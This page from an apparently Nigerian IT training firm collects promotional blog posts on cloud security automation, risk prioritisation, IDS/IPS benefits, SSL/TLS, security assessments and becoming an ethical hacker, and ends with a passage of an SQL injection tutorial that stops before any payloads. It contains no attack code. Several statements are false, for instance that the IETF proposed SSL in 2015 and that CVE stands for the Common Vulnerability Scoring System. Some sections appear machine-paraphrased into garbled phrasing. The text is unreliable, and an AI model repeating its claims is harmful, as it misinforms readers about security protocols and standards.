Project and Research Nigeria

The Four steps to Bolster cloud security-Cloud Computing-Soutech Nigeria

There has been a rapid growth in the use of cloud storage and the cloud technology is gradually moving from the ‘cloud-first’ strategy to the ‘cloud-only strategy. This is because the technology of cloud computing is in the year 2020 expected to have up to take up to about 70% of the enterprise software as well as the infrastructure.

The growth in the technology of public cloud has exposed organizations to trending security threats that normally cannot be minimized by employing endpoint security methodologies and technologies.

 

 

Security will be compromised because without applying the modern and cloud-native approach. The factors that affect the security include;

1.New Architectures

The architecture of cloud is entirely different from the legacy data centers which require some new approaches in the area of security. Traditional tools like penetration testing tools and network scanners are so reliable because the cloud is API-centric.

2. Increase of DevOps

When it comes to using public cloud, DevOps are on their own which end up not involving, not informing and not making central IT security teams aware. IT security teams require a new method to monitor the event of things because so many organizations are pushing are changing codes and productions everyday.

3. A More sophisticated landscape for threat

Hackers have kept the pace of in the deployment of similar tactics in order to automate attacks while DevOps teams have driven in the direction of making their code deployment process automated. This means that the surface of the attacks has been changed and there is not a path of traffic that can be monitored again. Security teams in order to ensure they have more visibility have resorted to deploying the use of new tools in all aspects of the organizations cloud applications.

The Four step program in bolstering cloud security

The issues surrounding the cloud security can be solved by the use of modern and cloud-native platforms which can make automation process very easy in order to provide a monitoring process that is continuous and further more analyse and remediate for cloud security compliance. This model has been able to offer a much better avenue for protection in the cloud far more than the traditional security platforms. Top cloud security experts have revealed that in order to achieve a continuous and automated cloud security and compliance, four key elements have to be addressed which are

  1. Real-time discovery in order to match the increasing pace of cloud changes: It is quite unusual for firms and organizations to possess millions of data points which require evaluation with the increasing cruelty surrounding the deployments in the cloud. A platform that can handle all the data in real time and isolating rapidly any form of security deviations and variations from good states is needed to the keep the functionality is cloud active
  2. Automated Action: One thing organizations must do is to automate monitor and remediate these processes to keep up. They need also to be flexible in the aspect of determining the way automated responses are made. They must also be able to inform the human administrators if there is a need for any other action.
  3. Deep insights to identify risks that may not be obvious: Communication can falter when the number of teams is large. You should make provision on your platform for teams to gain ownership of their security while also setting up security operations for other teams and corporate management in the bigger picture. This platform must be able to evaluate security information and details alongside the global customer base or across time and geography to put out a warning against potential issues before they occur.
  4. Comprehensive and properly detailed reports must be put together by teams about their daily security compliances and this should not necessarily be done during the yearly audit. You should be able to view the past and present state of your security and compliance stances by just a glance.

 

In conclusion, as organizations and firms make efforts to rely on public cloud in order to drive their daily business schemes and activities, they should also focus on the security risks and simplify the processes that are involved in the assurance of protection and compliance. Continuous security and compliance present us with new opportunities in order to maximize the value of the public cloud in the process of trying to minimize the risk.

It is very important to place our focus on the key characteristics such as automation, deep-insights and robust reporting and real-time discovery while evaluating potential cloud security platforms. The is a popular saying the IT world that the deployment of cloud technology changes everything but what doesn’t change is the importance of ensuring security and compliance.

 

To learn more about the security of the cloud environment as well as other security methodologies such as, vulnerability assessments, risk assessments and penetration testing, subscribe to our services at soutech ventures to learn CEH course in details.

Cybersecurity breaches are inevitable; What to do to stay safe- Information Security tips-SOUTECH Nigeria

Cybersecurity threats have become a cause of concern for many organizations especially with the daily reports of cyber intrusions where large volumes of data theft and intellectual property are involved. With the rise of new exploitation techniques and methods such as insider threats ransomwares, and advanced persistent threats the need for investing in cybersecurity cannot be over emphasized.

It has also be proven to be difficult to find rapt solutions to cyberattacks because of the dynamism in cloud computing, operating environment, supporting mobile, the iOt (internet of things), remote users, the quest for support the network devices that users bring to their offices and of course the question of how, where and what strategies to deploy in terms of specific security.

James Comey, a former director in the FBI described two kinds of big companies in the United States. He categorized them into “into those who have been hacked by the Chinese and those who have not been hacked by the Chinese.” Also in January 2015 at the world Economic Forum which was about a year later, John Chambers a former CEO Cisco confirmed that the people that have been hacked, do not even know they have been hacked.”

From all of this information, does it mean that cybersecurity breaches are inevitable? If a cybersecurity breach is inevitable then is prevention really possible and is trying to secure data and data systems worth the money?

Despite the fact that these remarks are quite discouraging, organizations still go ahead with storing data, financial data, intellectual property and their personal data on networked systems. In the midst of all these risks, there are the good sides to data storage and security which outweigh the bad sides.

Cybersecurity involves managing risks

There are things that should be put in place to secure information even with the fact that cybersecurity breaches cannot be avoided. In environments where risk is managed, there are ways and processes that can be put in place to ensure that data breaches are avoided which I have described in my previous article as penetration testing, vulnerability assessments, and IT audits. The premise surrounding the management of risk, is that the risk scenario cannot be completely eliminated.

 

 

If these uncertainties can be erased, then the risk can totally be erased as well. There are two basic security measures that can be put in place if the risk of a cybersecurity breach does not amount zero. Now the first strategy is to cut down the probability of the occurrence of a cybersecurity breach and the second involves cutting down on the impact which the damage that occurs when a cybersecurity risk is discovered. In order to manage any type of cybersecurity risks, these two strategies and measures are very appropriate in managing them. Do not forget that the general way to approach cybersecurity is very transparent and easy to understand.

The first things to identify in the operation of business is the assets which means that information assets which include raw data, people, processes and technology have to be protected.

The second thing you must note is that the purpose of a risk assessment is to reveal risks scenarios which could lead to damage or loss of data through unauthorized and unexpected disclosures, modifications and loss of confidentiality of data assets. Risks components are very few. The typical scenario of a cybersecurity intrusion is when a threat leverages on a vulnerability to damage information asset security. In this example, the components of risk exist when there is vulnerability and an exploit takes advantage of that vulnerability, and also a threat actor uses that exploit to damage the information assets’ security. Therefore, the only things that can be controlled by the network security manager are the presence of vulnerabilities on the network. The next step that follows is making an attempt to identify the risk and eliminating it.

Typically, once a risk has been identified, it is known to be eliminated and when a vulnerability is eliminated, all the threat scenarios where the vulnerability is exploited is reduced to zero.

Cybersecurity Risk Prioritization

Risk management at its core is a decision-support tool and once all the necessary cybersecurity scenarios have been unraveled, the job of the decision-support tool is to prioritize the order and manner in which the identified risks can be mitigated or controlled.

If there are insufficient resources that are capable of handling all the identified vulnerabilities, then the activity of risk prioritization with an aim to remediate and mitigate it can be seen to be important. Prioritization is also very valuable even in the midst of sufficient resources in order to remediate the existing vulnerabilities.

Outcome vs Impact

The prioritization of vulnerabilities is based on its potential impact on the organization if the risk scenarios exploiting that vulnerability are all realized. It is important to try to understand what the impact is if the potential impact is the prioritization factor. Whenever a vulnerability is being exploited, there is an unwanted outcome which involves an unwanted disclosure of data, unauthorized modification or the loss of access to the information asset that is being affected by the vulnerability is being exploitation. The result if an unwanted outcome is referred to as impact.

In the HIPAA privacy or security rules, if the health records are stolen, the outcome is that information will be disclosed, but the impact to the organizations is that there could be there will be a mandatory breach in the costs of notification and the potential for fines and civil penalties could run into millions of naira and dollars.

The prioritization of vulnerability mitigation by its potential impact can be done in different ways and one of them is in the use of a prioritization tool called Common vulnerability scoring System (CVSS), which will provide a framework for which one can understand the characteristics and impacts of vulnerabilities in information technology.

When CVSS is used, there is a likelihood that when an organization discovers that its risk has been prioritized to low severity or medium severity, they will choose not to remediate it. But in the case of organizations with many systems including mission-critical systems, such organizations need to come to an understanding that the potential impact to that asset and organizations is not totally and solely dependent on the ratings of the CVSS, but it could be higher and the organization needs to remediate the vulnerability.

 

In conclusion, if it is true that cybersecurity breaches cannot be avoided then all is not lost. The only sad thing is it will not be possible to completely eliminate the uncertainty that there will be data breaches.

To learn more about vulnerability assessments, risk assessments and penetration testing, subscribe to our services at soutech ventures to learn CEH course in details.

 

The need for an Automated Approach to Cloud Security and Compliance- Challanges in Cloud Computing-Soutech NigeriaEducation

Regardless of whether you are in charge of general IT, IT security, DevOps or administrative compliance, odds are open cloud services are a consistently developing piece of your portfolio. This can be extraordinary for the business, empowering lower costs, more prominent dexterity and speedier speed to advertise. Be that as it may, it can exhibit new and serious difficulties in guaranteeing security and compliance.

The public cloud is a radical new world. In the event that you think customary techniques for securing the data center or firewalling the border will keep your information and applications secured, you might be in for a reality check. The main issue with taking an approach in the form of a legacy approach is that they were not intended for the cloud period, which implies they don’t support or make use of the API-driven infrastructure of the public cloud.

 

 

 

Whatever your part is in your organization, you can infer huge advantages by grasping a present day, cloud-local model that utilizes equipment that are built on purpose to consistently and consequently screen and oversee security and compliance along the API control plane.

If you are in charge of IT, security or compliance, you can diminish costs, enhance security and affirm more prominent control over cloud technology and shadow IT. In the event that you are in DevOps, you can move rapidly without sitting tight for endorsements from security—while disposing of the potential for the calamity that is continually approaching if appropriate security and consistence balanced governance are not being set up.

Given the proper cloud security platform, the general organization can make of use automation to decrease risk and expel the human components from imperative procedures. Automation enables you to accomplish and achieve a constant visibility scheme over your cloud deployments, empowering reliable duplication among use conditions, for example, improvement, organizing and creation.

Automation, Security, Compliance and the cloud

The adoption of cloud technology moves too rapidly and is liable to excessively quick changes for organizations and firms to depend on manual assets. The major test, be that as it may, is that most organizations still utilize legacy devices, innovations and methodologies to oversee cloud security and compliance.

Luckily, new cloud-local arrangements are presently accessible, conveying an agent-less platform intended particularly for recent modern clouds.

 

These arrangements use the cloud’s API engineering architecture to determine gigantic adaptability in scaling and overseeing cloud security and compliance.

 

 

 

 

The steps below therefore will depict how an advanced automated approach to deal with persistent cloud security and compliance works. It depends on the Evident Security Platform from driving cloud security firm Evident.

Step 1

Close Observation: The environment revolving around cloud computing is evolving persistently. These progressions can be ordinary, routine exercises of your DevOps or IT groups; they can likewise be crafted by individuals who might do mischief to your business. As changes are made—over all cloud platforms, services and regions—the cloud security platform screens the designs of the cloud infrastructure to guarantee that it holds fast to security and compliance best practices.

Step 2

Assessment: The security platform safely gathers information about the services in your cloud and constantly performs checks against a progression of foreordained best security standards. It additionally performs checks against any predefined custom marks. These checks decide, on a persistent premise, if there are any conceivably exploitable vulnerabilities.

Step 3

In-depth Analysis: The platform at that point plays out an investigation to decide if the misconfigurations and exposures are prioritized and quantified into high, medium or low risk levels.

Step 4

Automated Remediation: The result of the subsequent analysis being performed is shown on a dashboard and can be sent to incorporated frameworks for auto-remediation work processes to set in.

Step 5

Robust Reporting: Comprehensive and detailed reports are made accessible so your groups can see data involving the risk, as well as client attribution and infected assets.

Step 6

Correction: The groups would then be able to utilize simple-to-follow remediation methodologies to recover the infrastructure to a safe state.

Conclusion

Public cloud is not going to be phased out any time soon but before the decade’s over, people in general cloud administrations/services market will surpass $230 billion, as predicted by Forrester Research. As cloud turns out to be more key to the accomplishment of your organization, it is key that you concentrate on security and compliance, regardless of whether your part is in IT, security, DevOps or corporate administration and compliance.
By grasping a constant security model, your organization will have the capacity to process many procedures that would overpower your groups and frameworks on the premise that they must be done manually. It not just accommodates upgraded security and compliance assurances, it likewise calms the weight on your staff, enhances security for DevOPs and different groups, and brings down the cost and danger of cloud security and compliance.

Cloud computing and its associated technologies is a very broad field. But I have in a few of my writeups been able to discuss the few trends and challenges that is being faced in the cloud environment. To learn more about vulnerability assessments, risk assessments and penetration testing, subscribe to our services at Soutech Ventures to learn CEH course in details.

Six important benefits of IDS/IPS in your business-Secure your network-Tips from SOUTECH Nigeria

Intrusion detection systems (IDSs) and intrusion prevention systems (IPSs) have been very effective over the years in countering against cyberattacks and also in the securing the network perimeter on the segments of the internal network. They serve as extra eyes in the aspect of securing data from losses and authorized access and any form of damages which can lead to collateral damages to the organization in both monetary terms and its reputation.

 

 

Now, the usage and effectiveness of this devices and technology can only survive when there is sufficient manpower and training. Organizations and network administrators must come to the knowledge that the use of IDSs and IPSs require training in other to interpret and act on its results.

There are benefits in the deployment of the technology of IDS/IPSes in businesses which include

  • Identifying the number and the type of security incidents.
  • Making sure security events do not escalate to security incidents.
  • Improving on the ability if network devices being discovered
  • Protection of vulnerable assets.
  • Protection of Operating systems and application softwares

The use of all the information obtained here to meet various regulatory requirements.

Now let us go ahead and explore the benefits of IDS/IPS in information security.

1.Identifying security incidents

The technologies of IDS/IPS do not only help to capture logs of IP addresses and ports of the communication going between different systems but can also be used to identify some specific content inside a network packet. Example, they can use botnet controllers can capture reports that have been identified from any compromised endpoint devices and can also identify DDOS attacks.

The sensor in modern IDS/IPS can help to quantify the types and the numbers of such attacks that an organization is vulnerable to and can go further to help it alter any existing security controls and deploy some new ones. It can also identify bugs in softwares and address host and network device configuration issues. The results determined can be used to perform further risk assessments.

2. Prevention of Security incident

The deployment of IDS/IPS technology can help to prevent the occurrence of security incidents which it does by disrupting communication between an attacker and his target, it can also report security incidents as well. Sensors in modern IDS/IPS can take packets in the network and examine them based on the context of the protocols supporting it. Example, if there is an HTTP protocol attack such as cross site scripting and SQL injection attack, it can be detected and blocked. The sensors in IDS/IPS can identify and block anomalous behavior which can be in form of an out-bound traffic.

3.Protection of vulnerable assets

IDS/IPS have been upgraded to be virtual patches for some software vulnerabilities. This enables network administrators to block any form of attacks until patches have been developed for such software vulnerabilities and until the cost for replacing systems until the patches are ready. The ability to identify the level of patches can be very useful for gauging the deployment of patches and for automation of vulnerability assessments.

 

4. Identification of network devices and hosts

Sensors in IDS/IPS can be used in a passive means to detect the presence of network devices and hosts as well. They can do this based on;

  • The data within the network packets in real time
  • Identify operating systems and services which are offered by the network device of the host.

This can help to eliminate a great deal of the manual work that can be applicable in determining the number of systems that are available alongside their configurations. Apart from helping the automation of hardware inventories, IDS/IPS can be applicable in the identification of rogue devices in the network like unauthorized hosts and rogue wireless access points and rogue hotspots.

5. Leveraging of information gained to meet regulatory requirements

IDS/IPS have the ability to give an organization deep insight into their networks and their connected resources. Regulatory mandates can also be met for example in the PCI-DSS 1.1.6 documentation, there is permission for the documentation and business justification of use of all the services and protocols and it can be researched using reports obtained from IDS/IPS logs.

6. Improvement in the Return on Investment (ROI)

There has been an identification of some improved efficiencies and the attendance of labour costs. An organization can determine how much of a return on investment (ROI) IDS/IPS it can supply if the infrastructure is able to reduce or completely mitigate two major things which include;

  • Degradation and denial of internet service and/or internal network service such as application service downtimes and business ramifications of the network.
  • A security breach which involves the loss of sensitive customer information and credentials as well as intellectual property.

My word for network administrators is to explore more on the use of the IDS/IPS to boost business and ensure that asides their basic functions, they are able to harness other functionalities in these devices.

To learn more about vulnerability assessments, risk assessments and penetration testing, subscribe to our services at soutech ventures to learn CEH course in details.

What You Don’t Know Can Hurt You-Cloud Security Issues revealed-SOUTECH Nigeria

 

 

 

One of the major issues that Computer Information Officers and chief Information Security Officers (CISO) is in the aspect of gaining visibility into the posture of their cloud security. How can they be expected to put in the place the proper and necessary controls and security measures if they cannot even identify where there are security flaws and where they exist.

If there isn’t a new approach, the problems will aggravate even before there is any hope of rendering a solution. Now why is this so?

Let us see various ways;

Without a new approach, the problems promise to get a whole lot worse before they get better. Why? Let us count the ways:

1.Growth of public cloud: Organizations have now deployed the use of cloud services to a much degree ever more than before. According to a study the use of cloud services in the average enterprise now amounts to about 1,427 services.

2. Shadow IT:

A lot of the publicly available cloud services and applications result from the initiative of the shadow IT are usually out of the control of the security teams and line-of-business managers why seem not to be familiar with security and best practices in compliances.

 

 

 

3. DevOps: Like I mentioned in my follow-up article on DevOps, DevOps teams have continued to outpace security teams going out on their own to deploy public cloud services to increase the rate of their development.

These teams do not often want to dragged behind by the concerns of the security and compliance.

 

 

 

 

4. Tools and technologies that have become extinct: Traditional tools that can be used for monitoring remediation endpoints have not been effective in the environments of data centers and cannot be effective and efficient for use in the security of public clouds.

5. The Pace of change: For manual processes to be able to keep to the pace, cloud environments change too quickly. Let us assume that organizations are even able to hire and retain personnel that are trained and have experience in the compliance and management of cloud security. CISOs and CIOS need to really worry about complacency in the use of cloud storage because public cloud providers like amazon web services and MS Azure have stepped up their game in the past couple of years. And because of this, surveys have shown that IT heads are becoming less worried of the security challenges in cloud environment. It has also been discovered that the biggest risks are always more in the internal network than in the external network.

6. The relationship between automation, visibility and continuous security and compliance: The questions therefore is on how CIO’s and CISOs gain the needed visibility they may need in order to minimize and maximize protection. The simple answer is through automation and this can be achieved by automating the process of remediation, analyzing and putting up monitoring measures across the whole cloud environment, security teams can gain the visibility they need in order to address their biggest cloud security and compliance challenges. The architecture of the cloud makes it a perfect fit for an automated approach to security and compliance this is because architecture of the cloud environment uses the API model, cloud-native agentless solutions. This architecture can be deployed to give IT security and DevOps teams some level of tremendous visibility and flexibility. With and automated model, it is very possible for CIO and CISOs can;

  • Obtain a view that gives bigger picture across all their cloud environments with a centralized means to manage and control events.
  • Allow DevOps and other teams to manage best practices in security and compliance that can be necessary for their own cloud deployments and controls.
  • Lower costs and reduce risk levels and complexities which can be done by replacing manual tasks with processes that are automated.
  • Enhance time with respect to value which can be achieved by securely making use of the public cloud to empower the smaller teams be they individual lines if businesses or DevOps
  • Flag risks and remediate the threats even before they get an opportunity or chance to affect availability, compliance and operations.

Finally, a plethora of openings Public cloud services have created for security officers by helping them to deliver significant value to their establishments in a lower costs, accelerated development cycles and greater work rate in productivity. However, there are a lot of risks masked behind these opportunities and these risks are surrounded by security and compliance. But the good thing is that there is a success path which can result in automation for providing continuous security and continuous compliance. This is the time to take the first step towards cloud security.

To learn more about the security of the cloud environment as well as other security methodologies such as, vulnerability assessments, risk assessments and penetration testing, subscribe to our services at soutech ventures to learn CEH course in details.

The Secure Socket Layer and how it secures your internet sessions- Be Educated-SOUTECH Nigeria

I’ll be teaching here on the Secure Sockets Layer because most of I believe have been hearing of SSL as a protocol but do not know how it works; don’t worry I’ve got you. What is SSL?

Secure Sockets Layer is a protocol applicable in computer networks that secures connections that exist between network application clients and servers on insecure networks such as the internet. SSL was proposed for use on the internet by the Internet Engineering Task Force (IETF) in 2015 because of the very many protocol and implementation flaws and vulnerabilities found in the other internet protocols. It has however been replaced by the TLS (Transport Layer Security) protocol. TLS and SSL are however not compatible together so therefore TLS is deployed in the SSL 3.0.

SSL was originally developed as a protocol in its proprietary state in the 1990s such that it allows the Netscape browser clients which work over the HTTP (hypertext Transfer Protocol) to communicate securely with Netscape web servers. SSL was eventually adopted for use to secure authentication and encryption in network transport layer communications.

Encryption Standard used in SSL

 

SSL makes use of two keys which are the public key and the symmetric key to ensure encryption when two machines when they establish a connection. These machines can typically be web or mail server and a client system communicating over the internet or some other TCP/IP network. SSL makes sure that data that is being sent between two processes working in the client and server model is encrypted and authenticated.

SSL works above the transport and network layer and is responsible for the transportation of data packets between processes and data routing of network traffic over a network between a client and server. It also works below the application layer protocols like the popular HTTP and SMTP (Simple Mail Transport Protocol).

Ever wondered what the word ‘socket’ in the term SSL refers to? It refers to the sockets method which data is transported between a client and server program in a certain network or between processes that take place on the same computer device.

Like I said, TLS protocol was developed from the SSL and has phased out the SSL protocol but in the aspect of SSL or SSL/TLS, they are still commonly used to refer to the protocol that was used to protect the internet traffic. SSL/TLS is the most widely deployed security protocol being used today and has been known secure up to about 50% of the pages that have been loaded on the Google chrome browser. SSL has been specifically implemented for applications such as email, file transfer, VoIPs, instant messaging which is an additional method to support the transmission of web pages.

How does SSL work?

The SSL protocol has majorly two sub-protocols which are;

  • The Record Protocol: This protocol defines how the hosts communicating will use exchange data via the SSL which include specifications for how data is to be prepared before being transmitted. It also tells how the verification and decryption of the received data.
  • The Handshake Protocol: This protocol defines how the client and server go about to establish an SSL connection. This includes the negotiation in way the cryptographic systems and each host is willing or unwilling to be engaged in the exchange of cryptographic materials. This includes the session keys and public keys for the encryption or authentication or transmitted data.

Now, during the handshake process, the initial process that takes place is that the server presents its digital certificate in order to be authenticated with the client. The server certificates use the X.509 certificate standard format which is defined by the public key cryptography standards. In order to be authenticated, the public key encryption validates the digital certificate and is used to confirm that the server is what it says it is.

Immediately the server is authenticated, the client and the server will go ahead to establish the settings of the cipher and a shared key will be used to encrypt the information that is being exchanged until the session expires. By this way, data confidentiality and integrity are assured and the whole process is invisible to the user.

Now let us look at this example, if a webpage is in need of an SSL connection, the URL will be changed from HTTP to HTTPS and you will see a padlock icon on the left pane of the browser once the server gets authenticated.

 

The handshake process allows the authentication to happen between the client and server. When the server authentication is complete, the client has to present its certificate to the server in order to authenticate its identity before it is encrypted for the SSL session to be established.

Version 3.1 of the SSL was released as TLS 1.0 (which was named to avoid legal issues with Netscape) after IETF officially took over the SSL protocol in order to standardize it through the open process. Attacks perpetrated against the SSL have been majorly been focused on issues in the SSL implementation. POODLE (Padding Oracle On Downgraded Legacy encryption) vulnerability is a known flaw in the SSL 3.0 protocol which is as a result of the way it ignores padded bytes when running in the cipher block chain mode. This existence of this flaw gives room for an attacker to decrypt sensitive data like the authentication cookies. TLS 1.0 has not been known to be vulnerable to attacks because it shows that all the padding bytes need to have the same value and must be authenticated.

There are some other differences between the TLS and SSL which make it a more secure and efficient protocol which is in its message authentication, generation of the key material, and the supported cipher suites where TLS supports some new and recent secure algorithms. The most recent version is the TLS 1.2 and the publication of the next version is expected before the year of this year 2017 pending approval. This update may likely be called the TLS 1.3 or the TLS 2.0.

subscribe to our CEH course at SOUTECH ventures to know more about network security and this subject topic in full. Call us today: 08034121380

Check out SOUTECH bespoke training sessions of over 20 Professional IT courses.

Professional IT Courses Training in Abuja: Web Design, Ethical Hacking, Networking, Mobile App Development, Project Management

Order any of our IT Training Kits

https://buyallsoftwares.com/

BEST PRACTICES FOR PERFORMING AN INFORMATION SECURITY ASSESSMENT-SOUTECHNIGERIA TIPS

Dear reader, do you know of the best way to measure information security risk? My favorite answer is that you dive in immediately to find those vulnerabilities that are specifically inherent in your system and applications. This can be likened to humans going through different tests to know the situation of their health through blood tests and analysis as well as magnetic resonance imaging and the likes. Some IT experts may refer to this kind of exercise as IT security audits while some may refer to it as penetration testing. Well, I will say that when you are performing an in-depth analysis of any IT infrastructure, it is not just about comparing policies to the working mechanism of things and trying to proof a point. This is the reason why I prefer to call this exercise information security assessment. Information security assessment is a broader and a more meaningful standard to unravel areas where security policies and procedures are lagging.

The ultimate goal in security testing is to find and fix any form of weaknesses in a system before anyone gets to exploit them and this is the core reason why the semantics of security testing is debated. It is therefore the duty of all security professionals to ensure that proper steps and measures are taken to ensure risk identification is understood. Let us put ego and politics aside and ensure that the key components of an effective information security scheme is given the desired attention. What are the key components of a detailed information security assessment?

1.Support: One of the important components is support of management. This is because no good information security assessment scheme can be successful without first receiving the support of management. If the leadership of an organisation is not willing to invest immensely their resources into making sure that their IT infrastructure is protected to a great extent, then the battle will be much more uphill. The focus should be on getting and keeping the right team on the organizational board. The target should not be on just management but on the security staff and member of the team.

2. Scope: This is known to be a very vital phase of information security assessment and I have seen many examples where the applications, systems and even the entire IT network is being excluded from security testing. The reasons are usually the same which may be insufficient time and lack of money. In as much as you need to fine tune the scope of your work, you have to make sure that all the critical systems are looked at and as soon as possible. In subsequent times, you may need to totally look at your environment because it requires a benign system, network segments or security process to out everything in jeopardy. The systems to be considered are the external and internal systems as well as the systems that are being hosted in the cloud by third parties as well as the marketing website. Also, it is of absolute necessity to do an authentic security testing of both the web applications and the operating systems. Ensure all that there is a fair test conducted on the people, the processes and all the physical system.

3. Testing: The testing phase should include and begin with vulnerability scan by using a vulnerability scanner to perform a manual analysis to discover the areas that are susceptible to attacks as regards to our context of the business environment. This phase usually includes activities like;

  • Password cracking
  • Wireless network analysis
  • Email phishing

The most important in this phase is to do an overview of the business environment from an attackers’ viewpoint in order to see the areas that can be exploited and then demonstrate what may happen so that the issue can be analyzed and steps taken towards resolving it.

4. Reporting: Doing a 500-page PDF report from a vulnerability scanner will not make it either easy to understand the issue or prevent it from happening. The aim of a report is to obtain a security assessment report that is concise prioritizes findings and recommendations on the way out. The report does not have to be lengthy but needs to be drafted in a way that will cut to the chase and give an detailed outline of the specific areas of weaknesses that should be given immediate and proper attention. This is often done from the viewpoint and professionalism of the security professional taking into account the business and systems. IT security auditing and penetration testing are the elements that are incorporated here as well. There are many standards to draft out good reports but I’m usually not a big fan of follow too many standards but I advocate that you draft out something that works for you. You can look out for templates such as the CVE (Common Vulnerability Scoring System) and some similar ratings which provide a severe rating for SNMP (Simple Network Management Protocol) which is being enabled with a two-default community string. If the vulnerabilities are discovered to be on very high risk, then what will be the dangers of a weak firewall password. Missing patches that are remotely exploitable, SQL injections on intrinsic web applications? What should rather be applicable here is common sense and the worst kind of information security assessment that can be performed and that will not have a formal report with issues that cannot be resolved.

5. Resolution: After a detailed report has been made, we must take all the discovered problems are try to develop solution plans for them. Majorly, problems should be found and fixed. I have seen security reports that contain unacknowledged and pending solutions after a security assessment. There is an easy fix which involves assigning responsibilities and ensuring that everyone is held accountable. The usual cycle for performing your information security assessments spans from 6months to a year depending on the environment. An alternative way is to do a follow-up from a time frame of 30 to 45 days after a report is drafted when performing a remediation validation of all the critical and highly prioritized findings.

6. Oversight: This involves ensuring that the security process between the security assessments will require things like tweaking of the existing systems and software including an implementation of the new technical controls with an outright of the policies and processes. Instead of trying to achieve a perfect security, your target should be on moving forward should on achieving a good security with a shorter time for catching flaws and resolving them. The management must be engaged with the task of achieving this plan with the executives kept on board with whats required in the aspect of compliance and contractual obligations. Whether or not they are interested, the right people must be kept to make sure security is ensured. By doing this Return on Investment is assured which is essential for business growth. Note that security is not out of mind but a priority.

As final words, I will say that the bottom line of the matter is that every business organisation has information and computing infrastructure that criminal hackers or malicious attackers are interested in for their gains. Of course, you know that you cannot totally be safe or immune from information risks and attacks so you must know the value of information security assessments. Organisations and businesses I would advise not to depend on IT security auditing and penetration testing to be safe. Neglecting IT security assessments is not a defensive option for due care. Furthermore, take out time to properly plan and strategize on how to perform information security assessment, ensuring that the task is completed and that the proper staff members in IT, development management and elsewhere are appraised on the findings so the matter can be resolved.

Some security professionals and vendors will try to paint it that information security assessment is not a difficult exercise to perform and will not be a very expensive project given its virtual return on investment. But I must tell you that your information security program will be a deep reflection of what you invest in. That means if you fail at it, then you stand a huge chance of shutting down your infrastructure. So, I will tell you a quote from warren Buffet which says “you only have to do a very few things in your life so long as you don’t do too many things wrong.” Assessments are never and will not be the perfect solution to your security problems even though it is performed periodically or consistently. The fact that you have tall fences, a big and strong gate and armed men at your does not guarantee 100% your safety. However, there is a big level of assurance that if you choose to ignore this exercise, history will of a surety repeat itself.

You can subscribe to our services at Soutech ventures to give you the desired security ideas that you may require to carry out a detailed and successful information security assessment. You can also learn our Ethical Hacking course from EC-Council which is desired to educate and give you hands-on knowledge on how to secure your infrastructure.

Want to become a Hacker? What you must do!- Soutech Ventures CEH training

You are a beginner whose intention is to learn how to hack but you’re wondering where to start from. If you are in this category, then I’ve got your back, you are definitely in the right place. If you’ve noticed, most of the free books and resources on hacking you may find on the internet are actually crafted for persons with some level of knowledge in the specified subject area. These materials do not give a comprehensive knowledge of the hacking scheme.

This is however the reason why I have decided to post something for the beginners and anyone who needs to start their journey into the hacking world and being hackers. I am going to describe a few requirements and the basic things to do to make the journey a pleasant experience for you.

 What is the Best way to Learn hacking as a beginner?

Here are a few steps; Lets go-

STEP 1: Start with the Basics

I will in my usual way always advice beginners who have had a little or not even a slight knowledge of hacking before to begin from the basics. Do not just learn how to hack anything but you can instead start exploring or doing some research about topics in IT such as computer networks, network services and common ports (FTP, TCP, SMTP, HTTP, HTTPS, DNS etc.), firewalls, some common and widely used network protocols, IP addresses. You can also their working mechanism.

You may also learn about some operating systems such as Linux which is one of the basic operating systems useful in the hacking environment. Just so you know, the more you know about the basic working principle of IT-related topics and concepts, the easier it becomes for you to find vulnerabilities and device exploits. This will also go a long way to help you when applying your hacking techniques in practice. Hacking covers the weaknesses or vulnerabilities in every field in IT, so you need to some extent a good background in basics. So begin your research now.

Step 2: Get a reliable and good source to begin your learning

If you desire to have a fair knowledge or basic hacking and the trending technologies in the IT field, there are books online and websites that can equip you technically. These books can also give you some technical background in vulnerabilities and any possible ways to exploit these vulnerabilities. However, it can be very difficult to find such books and web resources that can directly teach you how to hack from the basics in a simple and easy way.

If one has a fair amount of experience in the field of hacking, there exists so many books and websites that give out technical information on latest vulnerabilities along with possible ways to exploit them. However, for beginners it is hard to find sources that teach hacking right from the basics in a simple and easy to follow manner.

Step 3: Learn a programming Language (Optional)

Learning a programming language keeps you a step ahead of any hacker and any acquired skill. There are a lot of readily available programs and ready-made tools that can give you easy access to hack, it is always better to have some basic knowledge of programming scripts and languages like JavaScripts, PHP so that you can be in a position to manufacture you won tools in order to exploit codes. Like I said in the heading of this step, it is totally optional, there are very hackers who do not major in programming.

Step 4: Enroll for an Enthical Hacking Course

One of the courses that has been structured to give you apt and excellent knowledge and skill in hacking is the EC Council Certified Ethical Hacker (CEH) course. There are other courses that are in this line such as CISSP which is governed by another body. But CEH is a basic start for you if you must learn about hacking and be very grounded. CEH v9 offers about 19 modules that are well structured to cover all the IT fields.

If you are in Nigeria and in the cities of Abuja and Lagos precisely and you intend to take up a CEH course, you can call us today at Soutech ventures or visit our website. You have every information you may need. We have experienced and certified tutors in this field that can teach you with clear and simple breakdown of concepts of the CEH syllabus. So be sure you have made a right choice in Soutech.

How Long does it take to be a Good Hacker?

I always tell my students that hacking cannot be mastered overnight and the process must never be rushed. It is a field that combines in-depth knowledge, skills, creativity, dedication and a great deal of time to be invested. It may take between a few months to a few years to develop and be skillful in hacking depending on the time and effort you invest. Infact, everyone can become very skillful but it depends on the on how they learn and their foundations they build. The foundation you give yourself matters a great deal, if the foundation is lagging in a certain aspect, you will have issues in understanding and working on some technical details. So, if you want to become a good hacker, all you need is the passion to learn and a good source of knowledge that will help you understand the basics added with some level of patience and perseverance.

 

 

Tutorial on SQL Injection: SOUTECH Ventures

What is SQL Injection?

SQL Injection often referred to as seqel-i or structured query language is a malicious attempt on a website whereby an attacker injects an SQL command (payload) into an SQL statement which controls the database of a web application. The web application can also be referred to as Relational Database Management System (RDBMS) and it has a web input field.

SQL injection vulnerabilities have been known to damage websites or web apps that use SQL-based database. SQLi’s have been known over time to be one of the lethal means of attacking websites whereby an attacker attempts to exploit a web application. In order to bypass the authentication and authorization mechanisms in a web application, the attacker will attempt to gain unauthorized access to the web app using SQLi. The attacker or malicious user after gaining access into the web application, can delete, modify or even update the database, make changes to the columns or rows depending on what their intentions are at the time. When this is done, the data integrity of the SQL-based database will be compromised.

How Does SQL Injection work?

In order to exploit the web application, all the attacker has to do is to find an input field that is embedded in the SQL query of the database. A vulnerable website requires a direct user input in the SQL statement in order for an SQLi attack to take place. When this is done, the attacker then injects the payload which is included in the SQL query which in turn is used to launch the attack on the web server.

